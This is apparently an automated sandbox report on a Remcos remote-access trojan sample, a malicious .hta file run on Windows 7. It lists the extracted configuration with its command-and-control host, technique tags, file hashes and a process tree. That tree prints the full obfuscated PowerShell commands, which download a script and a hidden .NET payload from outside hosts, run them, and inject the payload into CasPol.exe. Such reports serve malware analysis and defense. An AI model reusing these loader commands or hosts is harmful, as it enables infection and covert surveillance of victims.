remcos | 986b693f564b364a2f69261f1f825d6a26afec8db9a3aa46fd2a964e45dc2a1c

Analysis

max time kernel
149s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
23-01-2025 16:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

24d95803236fde4ee8ebfe4671dc28fe.hta
Size

1.2MB
MD5

24d95803236fde4ee8ebfe4671dc28fe
SHA1

677e9c8b79a59b4fa3c8eab8fd318ae31dcd5d95
SHA256

986b693f564b364a2f69261f1f825d6a26afec8db9a3aa46fd2a964e45dc2a1c
SHA512

272adc89c2eedbfd065e3fa54edcb27211db44b998f3e5479cc53c6954c0b37db16e6d2eac0977c040068da07da651f8d9adc440d97e65bbdcb53afb0c4670a0
SSDEEP

768:tJnbjKx80AIu6GTs1A5fRgd4m2hX3IpXj1x+mLvGNtGLN0Go5cLzLWpXj1x5aGIA:tt

Score

10^/10

remcos remotehost defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

abeangana.duckdns.org:1121

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-B9B8CE
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 4 IoCs

flow	pid	Process
4	2832	powershell.exe
6	640	powershell.exe
8	640	powershell.exe
9	640	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2832	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
640	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 640 set thread context of 1744	640	powershell.exe	40

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2832	powershell.exe
640	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 2412	2340	mshta.exe	31
PID 2340 wrote to memory of 2412	2340	mshta.exe	31
PID 2340 wrote to memory of 2412	2340	mshta.exe	31
PID 2340 wrote to memory of 2412	2340	mshta.exe	31
PID 2412 wrote to memory of 2832	2412	cmd.exe	33
PID 2412 wrote to memory of 2832	2412	cmd.exe	33
PID 2412 wrote to memory of 2832	2412	cmd.exe	33
PID 2412 wrote to memory of 2832	2412	cmd.exe	33
PID 2832 wrote to memory of 2824	2832	powershell.exe	34
PID 2832 wrote to memory of 2824	2832	powershell.exe	34
PID 2832 wrote to memory of 2824	2832	powershell.exe	34
PID 2832 wrote to memory of 2824	2832	powershell.exe	34
PID 2824 wrote to memory of 2684	2824	csc.exe	35
PID 2824 wrote to memory of 2684	2824	csc.exe	35
PID 2824 wrote to memory of 2684	2824	csc.exe	35
PID 2824 wrote to memory of 2684	2824	csc.exe	35
PID 2832 wrote to memory of 2720	2832	powershell.exe	37
PID 2832 wrote to memory of 2720	2832	powershell.exe	37
PID 2832 wrote to memory of 2720	2832	powershell.exe	37
PID 2832 wrote to memory of 2720	2832	powershell.exe	37
PID 2720 wrote to memory of 640	2720	WScript.exe	38
PID 2720 wrote to memory of 640	2720	WScript.exe	38
PID 2720 wrote to memory of 640	2720	WScript.exe	38
PID 2720 wrote to memory of 640	2720	WScript.exe	38
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40
PID 640 wrote to memory of 1744	640	powershell.exe	40

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\24d95803236fde4ee8ebfe4671dc28fe.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2412
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2832
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qsg_sglq.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2824
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA1A.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCDA19.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2684
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2720
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAGEAeAB3AHUAYQA2ADMAeQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADUANAA0ADAANgAzAC8AMQBuAGUAdwBfAGkAbQBhAGcAZQBfAG4AagBwADAAeQByAC4AagBwAGcAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAdABhAGUAcgBnAGgAdABpAHcAcwBnAG4AaQBoAHQAZABvAG8AZwB0AHMAZQBiAC8ANQAyADIALwAyADEALgA5ADIALgA5ADMAMgAuADUANAAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:640
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabF73C.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDA1A.tmp

Filesize
1KB

MD5
de2b1f2a97fd4e024decabf9e743c9f4

SHA1
0774efe6e485b7a1722b0cb3a4c11a6272ae074e

SHA256
04f3e901ff7a5ef5234d1ab736c2a59670aedafd4da5d57747cb4651f7c85b78

SHA512
e697cbb626f122bb575c5193aa522e828d1a7e62fe210e08aa1646fe0966d350d20dfb337be116f6dff613f95c5e0ffc8ce6495861e22e4e8dfd93ece5f2e7b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF74F.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\qsg_sglq.dll

Filesize
3KB

MD5
a23639bbadceb46b81e72028aac5b14d

SHA1
b296205a6cb85ec24dfb70e3f7240db623e00e24

SHA256
5e7f0018ccd71aeefe7cf50b68e8c19d8d3c354e9157ea0322c4e0da173a922f

SHA512
d6c4a26a91b485d37ded5df4ae562b65461374e32713cf16aff0cf07a60e2c4b864d2af3f4289c630321c66ffd013ff529ad40f9a5e9ab9916cc3d9c68c665e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\qsg_sglq.pdb

Filesize
7KB

MD5
5908f0db65c068ac9fa6029c568852ab

SHA1
96318c348aadf90478d332829f4ada5a431dd485

SHA256
ecd7a3d271149ead4a3426ce30d8a9e56776d24eb163b9aebb75a5d5c626d144

SHA512
0b16649d20178cc808e12c459c8e567d12ff54fcd07618c3b8955892d5a6e15486e0430de6b74c1dd7a8ba01e6ea996715e64d2a712e077f98ab90800392d293

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BTG5ZGKPTPKBOOJIK06F.temp

Filesize
7KB

MD5
5dbbf1db6fbb37fb16328dd35c0bf1fb

SHA1
0444baa4a758b38c9d7bdfd88f966202b88ec0ba

SHA256
a575f4f0d55a176c24706a13ef43c0a317fa94786860b02f9b8b294d3d76b30a

SHA512
9af5f186a914935f5230b225853a0defba4db497069a81661cf0eff68f62c4c81acf596e556132c8bafe12a91780aa9f164031122335205997db81f4a6d7c949

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
96f9b67875ac093b4603d3080cd16e7e

SHA1
7d4d1c83d69e1028fce0d7afe8fb757fdffd8bf0

SHA256
ef331f707d47d27f7b36775483251b03c8c9c22a77a9d61846628c72f276f43d

SHA512
459537080f0c6fec15a6bd2f3b49d5786bf2c44fca2a189525fd89b8dae62f4a20ab6575b29a7aa38e79dd83c40d67f2158c86877254cbd9e5db064d707f7003

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs

Filesize
205KB

MD5
0e3b19cc6060bed0436e01fe8bc04c44

SHA1
8b99c60c35d7650ed451e3996bcccb7e9f51b7cf

SHA256
35315b1e950898c156611a9074ea43debd10d09098b855e9bfba76eef6ec3d17

SHA512
ad3267ee13123bebd28cee00cb2e128f0bf6213520378b5a45aa9d31b858f140612e2e6aee5d62be3a187af7c004de10ae1f0930e8133dc71c93f011fbde29e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCDA19.tmp

Filesize
652B

MD5
5439b3b7b668a957aa8f656f156b1436

SHA1
6796abb927b3c680ed992797b5eb7d70a7e0dc14

SHA256
778fdff1eb0364a2cb7eb6fb9d5ae248a4559f81010c4929b128a5c8108a11a1

SHA512
23860820f1cdb97940fa0efcbf4fef1dbc2329a3976bafaa879b7da06908e3ac85dcfbaa092c9b6798b482505c25ab694916fd1fe24a45bf8adb196073aaa837

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qsg_sglq.0.cs

Filesize
486B

MD5
3b886b3aeeb8599b37fc0be4fe6ae9d8

SHA1
b6d0a2488bd50c1b7f96cae0e91bdc3a083a5a7e

SHA256
b1dece05fc9ac39567b6cd75ae891827264b7d3606d5996807f1e88840e2c33e

SHA512
ecc3d89869a074e00b7dbb0c3fbe07fd534cb2a100ef6280ffc3f02f66ace38526746761b216061e5d7d519f0b685a1b89a2f51c4e24d8ee900b77b949268458

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qsg_sglq.cmdline

Filesize
309B

MD5
9db36798af8029e06a301ad3c7146722

SHA1
31df94728f6dc5ecf853b9458ae8a1c1bc131e5e

SHA256
356d7fdb9f359aa017afd07f9079fad53fcd7ededb5ef377fa71acdd9b82dd9d

SHA512
8e51f48556f60e0df576e033b74295a5f423015a895a455f71a1da46d0dcab029a33063fa85368726e5f490125965d9c091c00129f314f9e97f3d9f90e6fc5b4

Download Submit
memory/1744-83-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1744-88-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-73-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-77-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-84-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-71-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-81-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-79-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-85-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-86-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-87-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-75-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-89-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-90-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-91-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-92-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-93-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-94-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-95-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-96-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1744-97-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download